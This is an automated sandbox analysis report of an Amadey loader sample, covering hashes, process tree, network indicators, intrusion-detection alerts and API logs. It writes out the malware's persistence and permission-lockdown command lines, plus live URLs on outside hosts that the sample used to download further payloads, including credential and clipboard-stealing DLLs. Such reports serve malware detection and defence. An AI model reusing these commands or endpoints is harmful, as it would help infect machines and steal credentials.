Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	March 13, 2023, 9:40 a.m.	March 13, 2023, 9:46 a.m.

Size	235.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`5086db99de54fca268169a1c6cf26122`
SHA256	`42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4`
CRC32	`6598A359`
ssdeep	`6144:f36hrz456we4lz7zzZ5my2IuViMqJnyJQ:Pxpz7LmeuVi3nN`
PDB Path	D:\Mktmp\Amadey\Release\Amadey.pdb
Yara	UPX_Zero - UPX packed file Malicious_Library_Zero - Malicious_Library OS_Processor_Check_Zero - OS Processor Check Malicious_Packer_Zero - Malicious Packer IsPE32 - (no description) PE_Header_Zero - PE File Signature

lega.exe "C:\Users\test22\AppData\Local\Temp\lega.exe"
2004
- legenda.exe "C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe"
  2052
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe" /F
    2132
  - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "test22:N"&&CACLS "legenda.exe" /P "test22:R" /E&&echo Y|CACLS "..\f22b669919" /P "test22:N"&&CACLS "..\f22b669919" /P "test22:R" /E&&Exit
    2204
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      2296
    - cacls.exe CACLS "legenda.exe" /P "test22:N"
      2336
    - cacls.exe CACLS "legenda.exe" /P "test22:R" /E
      2388
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      2436
    - cacls.exe CACLS "..\f22b669919" /P "test22:N"
      2480
    - cacls.exe CACLS "..\f22b669919" /P "test22:R" /E
      2540
  - cc.exe "C:\Users\test22\AppData\Local\Temp\1000010001\cc.exe"
    2676
  - blueloader.exe "C:\Users\test22\AppData\Local\Temp\1000014001\blueloader.exe"
    2956
  - download.exe "C:\Users\test22\AppData\Local\Temp\1000015001\download.exe"
    2064
  - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
    1880

Name	Response	Post-Analysis Lookup
apps.identrust.com	A 121.254.136.27 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.57	23.43.165.105
downloads.buparts.store	A 87.236.19.211	87.236.19.211
buparts.store	A 45.130.41.59	45.130.41.59

IP Address	Status	Action
103.114.163.134	Active	Moloch
121.254.136.27	Active	Moloch
164.124.101.2	Active	Moloch
179.43.155.247	Active	Moloch
45.130.41.59	Active	Moloch
62.204.41.87	Active	Moloch
62.204.41.88	Active	Moloch
87.236.19.211	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 62.204.41.87:80 -> 192.168.56.103:49171	2402000	ET DROP Dshield Block Listed Source group 1	Misc Attack
TCP 62.204.41.88:80 -> 192.168.56.103:49172	2402000	ET DROP Dshield Block Listed Source group 1	Misc Attack
TCP 192.168.56.103:49171 -> 62.204.41.87:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 62.204.41.88:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 62.204.41.88:80 -> 192.168.56.103:49172	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 62.204.41.88:80 -> 192.168.56.103:49172	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 62.204.41.88:80 -> 192.168.56.103:49172	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 179.43.155.247:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.103:49174 -> 179.43.155.247:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 179.43.155.247:80 -> 192.168.56.103:49174	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 179.43.155.247:80 -> 192.168.56.103:49174	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 179.43.155.247:80 -> 192.168.56.103:49174	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 179.43.155.247:80 -> 192.168.56.103:49174	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.103:49176 -> 62.204.41.88:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 62.204.41.88:80 -> 192.168.56.103:49176	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 62.204.41.88:80 -> 192.168.56.103:49176	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 62.204.41.88:80 -> 192.168.56.103:49176	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 62.204.41.87:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 62.204.41.87:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 62.204.41.87:80 -> 192.168.56.103:49173	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.103:49180 -> 45.130.41.59:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 62.204.41.87:80 -> 192.168.56.103:49173	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 62.204.41.87:80 -> 192.168.56.103:49173	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 62.204.41.87:80 -> 192.168.56.103:49173	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 87.236.19.211:80 -> 192.168.56.103:49178	2014819	ET INFO Packed Executable Download	Misc activity
TCP 87.236.19.211:80 -> 192.168.56.103:49178	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 87.236.19.211:80 -> 192.168.56.103:49178	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 87.236.19.211:80 -> 192.168.56.103:49178	2014520	ET INFO EXE - Served Attached HTTP	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49180 45.130.41.59:443	C=US, O=Let's Encrypt, CN=R3	CN=buparts.store	94:9c:63:ef:79:4b:bb:12:cc:96:87:94:a5:a7:f3:44:30:5a:03:e1

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 13, 2023, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2023, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2023, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2023, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2023, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2023, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2023, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2023, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2023, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2023, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2023, 9:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 13, 2023, 9:40 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 13, 2023, 9:40 a.m.			0	0
IsDebuggerPresent March 13, 2023, 9:40 a.m.			0	0
IsDebuggerPresent March 13, 2023, 9:41 a.m.			0	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 13, 2023, 9:40 a.m.	buffer: SUCCESS: The scheduled task "legenda.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW March 13, 2023, 9:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW March 13, 2023, 9:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA March 13, 2023, 9:40 a.m.	buffer: r console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey March 13, 2023, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e92f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2023, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e92f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2023, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e91b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2023, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e9578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2023, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e9578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 13, 2023, 9:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e95b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

D:\Mktmp\Amadey\Release\Amadey.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 13, 2023, 9:40 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ March 13, 2023, 9:40 a.m.	stacktrace: 0x42e563d 0x42e2102 0x42e2013 0x42e1d69 0x42e1c4b 0x1f8c9e8 0x1f8c86b 0x1f8c7bb DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737 mscorlib+0x2d3711 @ 0x721f3711 mscorlib+0x308f2d @ 0x72228f2d mscorlib+0x3133fd @ 0x722333fd 0x1f100dc 0x1f10062 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f2f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74117f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74114de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 8b 00 6a 00 6a 00 6a 01 50 e8 09 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x1f35453 registers.esp: 3795956 registers.edi: 36286524 registers.eax: 33109304 registers.ebp: 3795968 registers.edx: 0 registers.ebx: 3796744 registers.esi: 0 registers.ecx: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

March 13, 2023, 9:40 a.m.

stacktrace:

0x42e563d
0x42e2102
0x42e2013
0x42e1d69
0x42e1c4b
0x1f8c9e8
0x1f8c86b
0x1f8c7bb
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x72f61838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x72f61737
mscorlib+0x2d3711 @ 0x721f3711
mscorlib+0x308f2d @ 0x72228f2d
mscorlib+0x3133fd @ 0x722333fd
0x1f100dc
0x1f10062
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74117f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74114de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 8b 00 6a 00 6a 00 6a 01 50 e8 09
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x1f35453
registers.esp: 3795956
registers.edi: 36286524
registers.eax: 33109304
registers.ebp: 3795968
registers.edx: 0
registers.ebx: 3796744
registers.esi: 0
registers.ecx: 0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (8 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://62.204.41.87/joomla/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://62.204.41.88/lend/Installer.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://179.43.155.247/cc.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://62.204.41.88/lend/blueloader.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://downloads.buparts.store/download.php?shortURL=DgIz04
suspicious_features	GET method with no useragent header	suspicious_request	GET http://downloads.buparts.store/views/download.php?shortURL=DgIz04
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://62.204.41.87/joomla/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://62.204.41.87/joomla/Plugins/clip64.dll

Performs some HTTP requests (9 events)

request	POST http://62.204.41.87/joomla/index.php
request	GET http://62.204.41.88/lend/Installer.exe
request	GET http://179.43.155.247/cc.exe
request	GET http://62.204.41.88/lend/blueloader.exe
request	GET http://downloads.buparts.store/download.php?shortURL=DgIz04
request	GET http://downloads.buparts.store/views/download.php?shortURL=DgIz04
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET http://62.204.41.87/joomla/Plugins/cred64.dll
request	GET http://62.204.41.87/joomla/Plugins/clip64.dll

Sends data using the HTTP POST Method (1 event)

request

POST http://62.204.41.87/joomla/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 116 events)

Time & API	Arguments	Status
NtProtectVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2676 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 151552 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002dc000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2676 region_size: 188416 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00560000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 1310720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e30000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00602000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00635000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0063b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00637000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0061c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00626000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0062a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00627000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0060a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 28672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0061d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f3f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 13, 2023, 9:40 a.m.	process_identifier: 2956 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
